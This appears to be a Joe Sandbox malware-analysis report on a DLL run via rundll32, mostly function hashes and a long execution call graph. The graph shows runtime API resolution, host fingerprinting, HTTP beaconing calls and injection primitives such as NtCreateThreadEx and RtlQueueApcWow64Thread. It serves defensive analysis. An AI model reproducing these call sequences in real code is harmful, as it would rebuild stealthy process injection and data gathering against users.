      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: D:\Jenkins\workspace\N_Poco-VS2022\poco-1.12.4\Foundation\src\UUID.cpp$uuid
      • API String ID: 3668304517-2288208422
      • Opcode ID: 25911d32c636301b8ceb874fa757822df2c01a8879f203403be8eb1c072caf74
      • Instruction ID: 3d5646af06f48f4ead0dfc35d341a1075a49795fa3766d4bc0825e9f98b57a39
      • Opcode Fuzzy Hash: 25911d32c636301b8ceb874fa757822df2c01a8879f203403be8eb1c072caf74
      • Instruction Fuzzy Hash: 8111E5B1A10A8C41EE93D72594463ED5322BB9D7F4F51E311F9BD026E69F68C38D8300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: ios_base::failbit set$vector too long
      • API String ID: 3668304517-3964744372
      • Opcode ID: 81fac164eb8069a64abdcd1d1755faf9489d3efc6c2a7fce3fddaad9cab7cb75
      • Instruction ID: 5d250b1aaa5fc9c5f3c4f56a8d0ffd0adc0d6c55e903586678183011968d96e5
      • Opcode Fuzzy Hash: 81fac164eb8069a64abdcd1d1755faf9489d3efc6c2a7fce3fddaad9cab7cb75
      • Instruction Fuzzy Hash: FFF0B471312A4885EF8ADF75D4583ED3291AB0CF94F548421EA8C46645DF28C6A88300
      APIs
      • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00000001801052A2), ref: 0000000180108FF8
      • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00000001801052A2), ref: 0000000180109039
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ExceptionFileHeaderRaise
      • String ID: csm
      • API String ID: 2573137834-1018135373
      • Opcode ID: 8ec78f723e8811bbb8f7cc3519f6b9e5d1aa5e1655d1be73bc864709e2988a38
      • Instruction ID: f49007e085962bb718d790a48bb9d5fc839186ba87080fc6a7ab3081cfab14e1
      • Opcode Fuzzy Hash: 8ec78f723e8811bbb8f7cc3519f6b9e5d1aa5e1655d1be73bc864709e2988a38
      • Instruction Fuzzy Hash: A311FB32215B8482EBA2CB25E44439977E5FB8CBA4F598225EACD07769DF38C655CB00

      Execution Graph

      Execution Coverage:4.3%
      Dynamic/Decrypted Code Coverage:100%
      Signature Coverage:0.9%
      Total number of Nodes:1814
      Total number of Limit Nodes:10
      execution_graph 17751 1b0a35cc300 17762 1b0a35c1440 17751->17762 17761 1b0a35cc341 17763 1b0a35c1459 17762->17763 17764 1b0a35c77e0 2 API calls 17763->17764 17766 1b0a35c1463 17763->17766 17765 1b0a35c14b2 17764->17765 17765->17766 17767 1b0a35bcce0 LdrGetProcedureAddress 17765->17767 17794 1b0a35c0fb0 17766->17794 17768 1b0a35c14d2 17767->17768 17769 1b0a35bcce0 LdrGetProcedureAddress 17768->17769 17770 1b0a35c14ed 17769->17770 17771 1b0a35bcce0 LdrGetProcedureAddress 17770->17771 17772 1b0a35c1516 17771->17772 17773 1b0a35bcce0 LdrGetProcedureAddress 17772->17773 17774 1b0a35c1535 17773->17774 17775 1b0a35bcce0 LdrGetProcedureAddress 17774->17775 17776 1b0a35c1554 17775->17776 17777 1b0a35bcce0 LdrGetProcedureAddress 17776->17777 17778 1b0a35c1573 17777->17778 17779 1b0a35bcce0 LdrGetProcedureAddress 17778->17779 17780 1b0a35c1592 17779->17780 17781 1b0a35bcce0 LdrGetProcedureAddress 17780->17781 17782 1b0a35c15b1 17781->17782 17783 1b0a35bcce0 LdrGetProcedureAddress 17782->17783 17784 1b0a35c15d0 17783->17784 17785 1b0a35bcce0 LdrGetProcedureAddress 17784->17785 17786 1b0a35c15ef 17785->17786 17787 1b0a35bcce0 LdrGetProcedureAddress 17786->17787 17788 1b0a35c160e 17787->17788 17789 1b0a35bcce0 LdrGetProcedureAddress 17788->17789 17790 1b0a35c162d 17789->17790 17791 1b0a35bcce0 LdrGetProcedureAddress 17790->17791 17792 1b0a35c164c 17791->17792 17793 1b0a35bcce0 LdrGetProcedureAddress 17792->17793 17793->17766 17795 1b0a35c0fc9 17794->17795 17796 1b0a35c77e0 2 API calls 17795->17796 17798 1b0a35c0fd3 17795->17798 17797 1b0a35c1022 17796->17797 17797->17798 17799 1b0a35bcce0 LdrGetProcedureAddress 17797->17799 17814 1b0a35c2ae0 17798->17814 17800 1b0a35c1042 17799->17800 17801 1b0a35bcce0 LdrGetProcedureAddress 17800->17801 17802 1b0a35c105d 17801->17802 17803 1b0a35bcce0 LdrGetProcedureAddress 17802->17803 17804 1b0a35c1086 17803->17804 17805 1b0a35bcce0 LdrGetProcedureAddress 17804->17805 17806 1b0a35c10a5 17805->17806 17807 1b0a35bcce0 
LdrGetProcedureAddress 17806->17807 17808 1b0a35c10c4 17807->17808 17809 1b0a35bcce0 LdrGetProcedureAddress 17808->17809 17810 1b0a35c10e3 17809->17810 17811 1b0a35bcce0 LdrGetProcedureAddress 17810->17811 17812 1b0a35c1102 17811->17812 17813 1b0a35bcce0 LdrGetProcedureAddress 17812->17813 17813->17798 17816 1b0a35c2af7 17814->17816 17815 1b0a35c2b01 17830 1b0a35c28c0 17815->17830 17816->17815 17817 1b0a35c77e0 2 API calls 17816->17817 17818 1b0a35c2b56 17817->17818 17818->17815 17819 1b0a35bcce0 LdrGetProcedureAddress 17818->17819 17820 1b0a35c2b76 17819->17820 17821 1b0a35bcce0 LdrGetProcedureAddress 17820->17821 17822 1b0a35c2b91 17821->17822 17823 1b0a35bcce0 LdrGetProcedureAddress 17822->17823 17824 1b0a35c2bba 17823->17824 17825 1b0a35bcce0 LdrGetProcedureAddress 17824->17825 17826 1b0a35c2bd9 17825->17826 17827 1b0a35bcce0 LdrGetProcedureAddress 17826->17827 17828 1b0a35c2bf8 17827->17828 17829 1b0a35bcce0 LdrGetProcedureAddress 17828->17829 17829->17815 17831 1b0a35c28d9 17830->17831 17832 1b0a35c77e0 2 API calls 17831->17832 17834 1b0a35c28e3 17831->17834 17833 1b0a35c2932 17832->17833 17833->17834 17835 1b0a35bcce0 LdrGetProcedureAddress 17833->17835 17858 1b0a35bf960 17834->17858 17836 1b0a35c2952 17835->17836 17837 1b0a35bcce0 LdrGetProcedureAddress 17836->17837 17838 1b0a35c296d 17837->17838 17839 1b0a35bcce0 LdrGetProcedureAddress 17838->17839 17840 1b0a35c2996 17839->17840 17841 1b0a35bcce0 LdrGetProcedureAddress 17840->17841 17842 1b0a35c29b5 17841->17842 17843 1b0a35bcce0 LdrGetProcedureAddress 17842->17843 17844 1b0a35c29d4 17843->17844 17845 1b0a35bcce0 LdrGetProcedureAddress 17844->17845 17846 1b0a35c29f3 17845->17846 17847 1b0a35bcce0 LdrGetProcedureAddress 17846->17847 17848 1b0a35c2a12 17847->17848 17849 1b0a35bcce0 LdrGetProcedureAddress 17848->17849 17850 1b0a35c2a31 17849->17850 17851 1b0a35bcce0 LdrGetProcedureAddress 17850->17851 17852 1b0a35c2a50 17851->17852 17853 1b0a35bcce0 LdrGetProcedureAddress 17852->17853 17854 1b0a35c2a6f 
17853->17854 17855 1b0a35bcce0 LdrGetProcedureAddress 17854->17855 17856 1b0a35c2a8e 17855->17856 17857 1b0a35bcce0 LdrGetProcedureAddress 17856->17857 17857->17834 17859 1b0a35bf978 17858->17859 17860 1b0a35c77e0 2 API calls 17859->17860 17863 1b0a35bf982 17859->17863 17861 1b0a35bf9d1 17860->17861 17862 1b0a35bcce0 LdrGetProcedureAddress 17861->17862 17861->17863 17862->17863 17863->17761 18537 1b0a35cbc00 18538 1b0a35cbc20 18537->18538 18539 1b0a35cbc30 18538->18539 18540 1b0a35c3270 3 API calls 18538->18540 18540->18539 17864 1b0a35ce100 17869 1b0a35d5a60 17864->17869 17867 1b0a35ce157 17870 1b0a35e51c0 NtReadVirtualMemory 17869->17870 17871 1b0a35d5a8e 17870->17871 17872 1b0a35e51c0 NtReadVirtualMemory 17871->17872 17873 1b0a35ce127 17872->17873 17873->17867 17874 1b0a35c9760 17873->17874 17877 1b0a35c2650 17874->17877 17876 1b0a35c9775 17876->17867 17879 1b0a35c2666 17877->17879 17878 1b0a35c2670 17878->17876 17879->17878 17880 1b0a35c77e0 2 API calls 17879->17880 17881 1b0a35c26c4 17880->17881 17882 1b0a35c281f 17881->17882 17883 1b0a35c26d7 17881->17883 17884 1b0a35bcce0 LdrGetProcedureAddress 17882->17884 17885 1b0a35bcce0 LdrGetProcedureAddress 17883->17885 17886 1b0a35c2833 17884->17886 17887 1b0a35c26e7 17885->17887 17888 1b0a35bcce0 LdrGetProcedureAddress 17886->17888 17889 1b0a35c2707 17887->17889 17892 1b0a35bcce0 LdrGetProcedureAddress 17887->17892 17891 1b0a35c284b 17888->17891 17890 1b0a35bcce0 LdrGetProcedureAddress 17889->17890 17893 1b0a35c2726 17890->17893 17894 1b0a35bcce0 LdrGetProcedureAddress 17891->17894 17892->17889 17897 1b0a35bcce0 LdrGetProcedureAddress 17893->17897 17900 1b0a35c2743 17893->17900 17895 1b0a35c2863 17894->17895 17896 1b0a35bcce0 LdrGetProcedureAddress 17895->17896 17899 1b0a35c287b 17896->17899 17897->17900 17898 1b0a35bcce0 LdrGetProcedureAddress 17901 1b0a35c2767 17898->17901 17902 1b0a35bcce0 LdrGetProcedureAddress 17899->17902 17900->17898 17903 1b0a35c2784 17901->17903 17904 1b0a35bcce0 LdrGetProcedureAddress 
17901->17904 17902->17878 17905 1b0a35bcce0 LdrGetProcedureAddress 17903->17905 17904->17903 17906 1b0a35c27a8 17905->17906 17907 1b0a35c27c5 17906->17907 17908 1b0a35bcce0 LdrGetProcedureAddress 17906->17908 17909 1b0a35bcce0 LdrGetProcedureAddress 17907->17909 17908->17907 17910 1b0a35c27e9 17909->17910 17910->17878 17911 1b0a35bcce0 LdrGetProcedureAddress 17910->17911 17911->17878 17912 1b0a35d8d00 17913 1b0a35d8d21 17912->17913 17914 1b0a35d8de3 17913->17914 17916 1b0a35db5e0 17913->17916 17918 1b0a35db5f6 17916->17918 17917 1b0a35db77a 17917->17914 17918->17917 17919 1b0a35dba6c 17918->17919 17920 1b0a35dba97 17918->17920 17923 1b0a35d3a20 17919->17923 17920->17917 17929 1b0a35d37b0 17920->17929 17927 1b0a35d3a8c 17923->17927 17928 1b0a35d3a97 17923->17928 17925 1b0a35d3c6b 17925->17927 17943 1b0a35b5d60 17925->17943 17927->17917 17928->17925 17928->17927 17935 1b0a35b3c30 17928->17935 17930 1b0a35d39e5 17929->17930 17932 1b0a35d3811 17929->17932 17930->17917 17931 1b0a35d387a 17934 1b0a35b5d60 2 API calls 17931->17934 17932->17930 17932->17931 17933 1b0a35b3c30 2 API calls 17932->17933 17933->17931 17934->17930 17936 1b0a35b3ca3 17935->17936 17940 1b0a35b3cac 17935->17940 17937 1b0a35e4be0 NtProtectVirtualMemory 17936->17937 17936->17940 17937->17940 17938 1b0a35b3da0 17938->17925 17939 1b0a35b3d78 17939->17938 17942 1b0a35e4740 NtFreeVirtualMemory 17939->17942 17940->17938 17940->17939 17941 1b0a35e4740 NtFreeVirtualMemory 17940->17941 17941->17939 17942->17938 17944 1b0a35b5e68 17943->17944 17945 1b0a35b5dc2 17943->17945 17944->17927 17945->17944 17946 1b0a35b5f8b 17945->17946 17951 1b0a35b61a1 17945->17951 17946->17944 17947 1b0a35b605a 17946->17947 17948 1b0a35b6033 17946->17948 17950 1b0a35e4360 NtCreateThreadEx 17947->17950 17949 1b0a35e4360 NtCreateThreadEx 17948->17949 17949->17944 17950->17944 17951->17944 17952 1b0a35e4ff0 RtlQueueApcWow64Thread 17951->17952 17952->17944 18637 1b0a35dca80 18640 1b0a35b99d0 18637->18640 18639 1b0a35dca96 18651 
1b0a35bfc40 18640->18651 18645 1b0a35c2d20 3 API calls 18646 1b0a35b9a0a 18645->18646 18647 1b0a35c2210 3 API calls 18646->18647 18649 1b0a35b9a0f 18647->18649 18648 1b0a35b4cd0 2 API calls 18648->18649 18649->18648 18650 1b0a35b9b2d 18649->18650 18650->18639 18652 1b0a35bfc57 18651->18652 18654 1b0a35b99f8 18652->18654 18655 1b0a35c77e0 2 API calls 18652->18655 18663 1b0a35bfcd5 18652->18663 18653 1b0a35bcce0 LdrGetProcedureAddress 18656 1b0a35bfcf0 18653->18656 18681 1b0a35bfe80 18654->18681 18657 1b0a35bfcb5 18655->18657 18658 1b0a35bcce0 LdrGetProcedureAddress 18656->18658 18657->18654 18660 1b0a35bcce0 LdrGetProcedureAddress 18657->18660 18659 1b0a35bfd19 18658->18659 18661 1b0a35bcce0 LdrGetProcedureAddress 18659->18661 18660->18663 18662 1b0a35bfd38 18661->18662 18664 1b0a35bcce0 LdrGetProcedureAddress 18662->18664 18663->18653 18665 1b0a35bfd57 18664->18665 18666 1b0a35bcce0 LdrGetProcedureAddress 18665->18666 18667 1b0a35bfd76 18666->18667 18668 1b0a35bcce0 LdrGetProcedureAddress 18667->18668 18669 1b0a35bfd95 18668->18669 18670 1b0a35bcce0 LdrGetProcedureAddress 18669->18670 18671 1b0a35bfdb4 18670->18671 18672 1b0a35bcce0 LdrGetProcedureAddress 18671->18672 18673 1b0a35bfdd3 18672->18673 18674 1b0a35bcce0 LdrGetProcedureAddress 18673->18674 18675 1b0a35bfdf2 18674->18675 18676 1b0a35bcce0 LdrGetProcedureAddress 18675->18676 18677 1b0a35bfe11 18676->18677 18678 1b0a35bcce0 LdrGetProcedureAddress 18677->18678 18679 1b0a35bfe30 18678->18679 18680 1b0a35bcce0 LdrGetProcedureAddress 18679->18680 18680->18654 18683 1b0a35bfe97 18681->18683 18682 1b0a35b9a05 18682->18645 18683->18682 18684 1b0a35c77e0 2 API calls 18683->18684 18685 1b0a35bfef6 18684->18685 18685->18682 18686 1b0a35bcce0 LdrGetProcedureAddress 18685->18686 18687 1b0a35bff16 18686->18687 18688 1b0a35bcce0 LdrGetProcedureAddress 18687->18688 18689 1b0a35bff31 18688->18689 18690 1b0a35bcce0 LdrGetProcedureAddress 18689->18690 18691 1b0a35bff5a 18690->18691 18692 1b0a35bcce0 LdrGetProcedureAddress 
18691->18692 18693 1b0a35bff79 18692->18693 18694 1b0a35bcce0 LdrGetProcedureAddress 18693->18694 18695 1b0a35bff98 18694->18695 18696 1b0a35bcce0 LdrGetProcedureAddress 18695->18696 18696->18682 18697 1b0a35d9c80 18699 1b0a35d9c9d 18697->18699 18698 1b0a35d9d43 18699->18698 18700 1b0a35b99d0 5 API calls 18699->18700 18700->18698 17953 1b0a35deb00 17955 1b0a35deb20 17953->17955 17954 1b0a35deb7c 17955->17954 17957 1b0a35d7220 17955->17957 17958 1b0a35d731d 17957->17958 17961 1b0a35d732b 17958->17961 17963 1b0a35debb0 17958->17963 17960 1b0a35d759b 17960->17961 17970 1b0a35cdcb0 17960->17970 17961->17954 17977 1b0a35bfa20 17963->17977 17967 1b0a35debcf 17969 1b0a35debe4 17967->17969 17997 1b0a35cd660 17967->17997 17969->17960 17972 1b0a35cdcdb 17970->17972 17971 1b0a35cdd54 17971->17960 17972->17971 17973 1b0a35cdf3a 17972->17973 17974 1b0a35cdf41 17972->17974 17975 1b0a35c6fa0 3 API calls 17973->17975 17976 1b0a35b7830 6 API calls 17974->17976 17975->17971 17976->17971 17979 1b0a35bfa37 17977->17979 17978 1b0a35bfa41 17987 1b0a35c3170 17978->17987 17979->17978 17980 1b0a35c77e0 2 API calls 17979->17980 17981 1b0a35bfa96 17980->17981 17981->17978 17982 1b0a35bcce0 LdrGetProcedureAddress 17981->17982 17983 1b0a35bfab2 17982->17983 17984 1b0a35bcce0 LdrGetProcedureAddress 17983->17984 17985 1b0a35bfacd 17984->17985 17986 1b0a35bcce0 LdrGetProcedureAddress 17985->17986 17986->17978 17989 1b0a35c3187 17987->17989 17988 1b0a35c3191 17988->17967 17989->17988 17990 1b0a35c77e0 2 API calls 17989->17990 17991 1b0a35c31e6 17990->17991 17991->17988 17992 1b0a35bcce0 LdrGetProcedureAddress 17991->17992 17993 1b0a35c3202 17992->17993 17994 1b0a35bcce0 LdrGetProcedureAddress 17993->17994 17995 1b0a35c321d 17994->17995 17996 1b0a35bcce0 LdrGetProcedureAddress 17995->17996 17996->17988 17999 1b0a35cd6a8 17997->17999 17998 1b0a35cd7c0 17998->17969 17999->17998 18000 1b0a35e51c0 NtReadVirtualMemory 17999->18000 18000->17999 18701 1b0a35b4885 18702 1b0a35b4950 18701->18702 18706 
1b0a35b4acf 18702->18706 18711 1b0a35b2680 18702->18711 18704 1b0a35b4a16 18704->18706 18719 1b0a35b52a0 18704->18719 18707 1b0a35b4a68 18707->18706 18727 1b0a35b1f00 18707->18727 18709 1b0a35b4aaa 18710 1b0a35b1f00 NtReadVirtualMemory 18709->18710 18710->18706 18713 1b0a35b273e 18711->18713 18712 1b0a35b27d3 18714 1b0a35ba370 NtReadVirtualMemory 18712->18714 18717 1b0a35b27da 18712->18717 18713->18712 18737 1b0a35ba370 18713->18737 18718 1b0a35b2805 18714->18718 18716 1b0a35ba370 NtReadVirtualMemory 18716->18718 18717->18704 18718->18716 18718->18717 18720 1b0a35b52e7 18719->18720 18721 1b0a35b5302 18720->18721 18741 1b0a35b5190 18720->18741 18721->18707 18723 1b0a35b5323 18723->18721 18724 1b0a35ba370 NtReadVirtualMemory 18723->18724 18725 1b0a35b5361 18724->18725 18725->18721 18726 1b0a35ba370 NtReadVirtualMemory 18725->18726 18726->18721 18728 1b0a35b1f3e 18727->18728 18729 1b0a35ba370 NtReadVirtualMemory 18728->18729 18730 1b0a35b1f87 18728->18730 18736 1b0a35b1f83 18729->18736 18730->18709 18731 1b0a35ba370 NtReadVirtualMemory 18731->18736 18732 1b0a35b21c0 NtReadVirtualMemory 18732->18736 18736->18730 18736->18731 18736->18732 18747 1b0a35b2140 18736->18747 18752 1b0a35b2be0 18736->18752 18764 1b0a35b36a0 18736->18764 18738 1b0a35ba38c 18737->18738 18739 1b0a35ba3a6 18737->18739 18738->18712 18739->18738 18740 1b0a35e51c0 NtReadVirtualMemory 18739->18740 18740->18738 18742 1b0a35b51dd 18741->18742 18745 1b0a35b51d4 18741->18745 18743 1b0a35ba370 NtReadVirtualMemory 18742->18743 18742->18745 18744 1b0a35b5218 18743->18744 18744->18745 18746 1b0a35b5190 NtReadVirtualMemory 18744->18746 18745->18723 18746->18745 18748 1b0a35ba370 NtReadVirtualMemory 18747->18748 18750 1b0a35b2175 18748->18750 18749 1b0a35b2179 18749->18736 18750->18749 18751 1b0a35ba370 NtReadVirtualMemory 18750->18751 18751->18749 18753 1b0a35b2d40 18752->18753 18762 1b0a35b2deb 18752->18762 18754 1b0a35b2d53 18753->18754 18756 1b0a35b52a0 NtReadVirtualMemory 18753->18756 18753->18762 18755 
1b0a35ba370 NtReadVirtualMemory 18754->18755 18754->18762 18757 1b0a35b2d7a 18755->18757 18756->18754 18759 1b0a35b2daa 18757->18759 18770 1b0a35b5070 18757->18770 18760 1b0a35ba370 NtReadVirtualMemory 18759->18760 18759->18762 18761 1b0a35b2e4b 18760->18761 18761->18762 18779 1b0a35b2ea0 18761->18779 18762->18736 18765 1b0a35b37e3 18764->18765 18768 1b0a35b36de 18764->18768 18765->18736 18766 1b0a35ba370 NtReadVirtualMemory 18766->18768 18767 1b0a35b21c0 NtReadVirtualMemory 18767->18768 18768->18765 18768->18766 18768->18767 18789 1b0a35b3800 18768->18789 18771 1b0a35ba370 NtReadVirtualMemory 18770->18771 18776 1b0a35b50aa 18771->18776 18772 1b0a35b50ae 18772->18759 18773 1b0a35b50bf 18773->18772 18774 1b0a35b50c9 18773->18774 18775 1b0a35b5070 NtReadVirtualMemory 18773->18775 18774->18772 18777 1b0a35b5070 NtReadVirtualMemory 18774->18777 18775->18774 18776->18772 18776->18773 18778 1b0a35ba370 NtReadVirtualMemory 18776->18778 18777->18772 18778->18773 18780 1b0a35b2efe 18779->18780 18781 1b0a35b321d 18779->18781 18780->18781 18782 1b0a35ba370 NtReadVirtualMemory 18780->18782 18781->18762 18783 1b0a35b2f42 18782->18783 18783->18781 18784 1b0a35ba370 NtReadVirtualMemory 18783->18784 18786 1b0a35b30d7 18784->18786 18785 1b0a35b31b7 18785->18781 18787 1b0a35ba370 NtReadVirtualMemory 18785->18787 18786->18781 18786->18785 18788 1b0a35ba370 NtReadVirtualMemory 18786->18788 18787->18781 18788->18786 18791 1b0a35b3862 18789->18791 18790 1b0a35b3a08 18790->18768 18791->18790 18792 1b0a35ba370 NtReadVirtualMemory 18791->18792 18792->18790 16891 1b0a35b7bf0 16892 1b0a35b7c06 16891->16892 16905 1b0a35b2930 16892->16905 16894 1b0a35b7c24 17046 1b0a35b8ed0 16894->17046 16896 1b0a35b7d64 17050 1b0a35d4d00 GetUserNameW GetComputerNameExW 16896->17050 16898 1b0a35b7f54 16899 1b0a35b7da4 16899->16898 17062 1b0a35e4740 16899->17062 16902 1b0a35c8c60 CreateFiber DeleteFiber 16904 1b0a35b7e3b 16902->16904 16904->16898 16904->16902 17066 1b0a35c3d90 16904->17066 17074 1b0a35b8bc0 
16904->17074 17083 1b0a35bffe0 16905->17083 16911 1b0a35b2943 17161 1b0a35c77e0 16911->17161 16913 1b0a35bedf0 16914 1b0a35bf5f5 16913->16914 17167 1b0a35bcce0 16913->17167 16914->16894 16917 1b0a35bcce0 LdrGetProcedureAddress 16918 1b0a35bee2b 16917->16918 16919 1b0a35bcce0 LdrGetProcedureAddress 16918->16919 16920 1b0a35bee54 16919->16920 16921 1b0a35bcce0 LdrGetProcedureAddress 16920->16921 16922 1b0a35bee73 16921->16922 16923 1b0a35bcce0 LdrGetProcedureAddress 16922->16923 16924 1b0a35bee92 16923->16924 16925 1b0a35bcce0 LdrGetProcedureAddress 16924->16925 16926 1b0a35beeb1 16925->16926 16927 1b0a35bcce0 LdrGetProcedureAddress 16926->16927 16928 1b0a35beed0 16927->16928 16929 1b0a35bcce0 LdrGetProcedureAddress 16928->16929 16930 1b0a35beeef 16929->16930 16931 1b0a35bcce0 LdrGetProcedureAddress 16930->16931 16932 1b0a35bef0e 16931->16932 16933 1b0a35bcce0 LdrGetProcedureAddress 16932->16933 16934 1b0a35bef2d 16933->16934 16935 1b0a35bcce0 LdrGetProcedureAddress 16934->16935 16936 1b0a35bef4c 16935->16936 16937 1b0a35bcce0 LdrGetProcedureAddress 16936->16937 16938 1b0a35bef6b 16937->16938 16939 1b0a35bcce0 LdrGetProcedureAddress 16938->16939 16940 1b0a35bef8a 16939->16940 16941 1b0a35bcce0 LdrGetProcedureAddress 16940->16941 16942 1b0a35befa9 16941->16942 16943 1b0a35bcce0 LdrGetProcedureAddress 16942->16943 16944 1b0a35befc8 16943->16944 16945 1b0a35bcce0 LdrGetProcedureAddress 16944->16945 16946 1b0a35befe7 16945->16946 16947 1b0a35bcce0 LdrGetProcedureAddress 16946->16947 16948 1b0a35bf006 16947->16948 16949 1b0a35bcce0 LdrGetProcedureAddress 16948->16949 16950 1b0a35bf025 16949->16950 16951 1b0a35bcce0 LdrGetProcedureAddress 16950->16951 16952 1b0a35bf044 16951->16952 16953 1b0a35bcce0 LdrGetProcedureAddress 16952->16953 16954 1b0a35bf063 16953->16954 16955 1b0a35bcce0 LdrGetProcedureAddress 16954->16955 16956 1b0a35bf082 16955->16956 16957 1b0a35bcce0 LdrGetProcedureAddress 16956->16957 16958 1b0a35bf0a1 16957->16958 16959 1b0a35bcce0 LdrGetProcedureAddress 
[Execution graph: fragment of the report's function call graph (node ids, node addresses and edges), not reproduced here; the listing is cut off at both ends. The information that survives is the set of Windows API calls reached from the graphed functions, with the node addresses as the report gives them:]

1b0a35bcce0 (node 1b0a35bcd9b): LdrGetProcedureAddress; called in long chains from many functions (e.g. 1b0a35bedb0, 1b0a35c16a0, 1b0a35c2d20, 1b0a35c3270, 1b0a35c3470, 1b0a35c23d0, 1b0a35c12c0, 1b0a35bf620, 1b0a35bfb20), i.e. imports are resolved at run time rather than through the import table
1b0a35c77e0 (nodes 1b0a35c780d, 1b0a35c78f1): RtlAddVectoredExceptionHandler, RtlRemoveVectoredExceptionHandler
1b0a35d4ce0 (node 1b0a35b8eee): CreateMutexExA
1b0a35d4dc7 / 1b0a35d4df3 / 1b0a35d4eaa / 1b0a35d4f8f / 1b0a35d4fea: GetComputerNameExW, GetTokenInformation, GetNativeSystemInfo, GetAdaptersInfo (called twice)
1b0a35e4759 (node 1b0a35e47ad): NtFreeVirtualMemory
1b0a35b7830 (nodes 1b0a35b788a, 1b0a35b7898, 1b0a35b78dd, 1b0a35b79cb, 1b0a35b7a3f, 1b0a35b7b0e): InternetOpenW, InternetConnectW, HttpOpenRequestW, HttpSendRequestA, InternetQueryDataAvailable, InternetCloseHandle
1b0a35e4360 (node 1b0a35e444e): NtCreateThreadEx
1b0a35e4ff0 (node 1b0a35e506a): RtlQueueApcWow64Thread; called repeatedly from 1b0a35c55c0 and from 1b0a35b71b0 after NtCreateThreadEx
1b0a35e45f0 (node 1b0a35e4684): NtDuplicateObject
1b0a35cf3a0 (nodes 1b0a35cf3f2, 1b0a35cf418, 1b0a35cf5fc, 1b0a35cf5fa): CreateToolhelp32Snapshot, Thread32First, Thread32Next, NtResumeThread
1b0a35e4be0 (node 1b0a35e4c5c) and 1b0a35d4a70 (node 1b0a35e4be0): NtProtectVirtualMemory
1b0a35b5190, 1b0a35ba370, 1b0a35e51c0 (node 1b0a35e523c): NtReadVirtualMemory
LdrGetProcedureAddress 17423->17424 17425 1b0a35c1e6f 17424->17425 17426 1b0a35bcce0 LdrGetProcedureAddress 17425->17426 17427 1b0a35c1ea0 17426->17427 17428 1b0a35bcce0 LdrGetProcedureAddress 17427->17428 17429 1b0a35c1ed1 17428->17429 17430 1b0a35bcce0 LdrGetProcedureAddress 17429->17430 17431 1b0a35c1f02 17430->17431 17432 1b0a35bcce0 LdrGetProcedureAddress 17431->17432 17433 1b0a35c1f33 17432->17433 17434 1b0a35bcce0 LdrGetProcedureAddress 17433->17434 17435 1b0a35c1f64 17434->17435 17436 1b0a35bcce0 LdrGetProcedureAddress 17435->17436 17437 1b0a35c1f95 17436->17437 17438 1b0a35bcce0 LdrGetProcedureAddress 17437->17438 17439 1b0a35c1fc6 17438->17439 17440 1b0a35bcce0 LdrGetProcedureAddress 17439->17440 17441 1b0a35c1ff7 17440->17441 17442 1b0a35bcce0 LdrGetProcedureAddress 17441->17442 17443 1b0a35c2028 17442->17443 17444 1b0a35bcce0 LdrGetProcedureAddress 17443->17444 17445 1b0a35c2059 17444->17445 17446 1b0a35bcce0 LdrGetProcedureAddress 17445->17446 17447 1b0a35c208a 17446->17447 17448 1b0a35bcce0 LdrGetProcedureAddress 17447->17448 17449 1b0a35c20bb 17448->17449 17450 1b0a35bcce0 LdrGetProcedureAddress 17449->17450 17451 1b0a35c20ec 17450->17451 17452 1b0a35bcce0 LdrGetProcedureAddress 17451->17452 17453 1b0a35c211d 17452->17453 17454 1b0a35bcce0 LdrGetProcedureAddress 17453->17454 17455 1b0a35c214e 17454->17455 17456 1b0a35bcce0 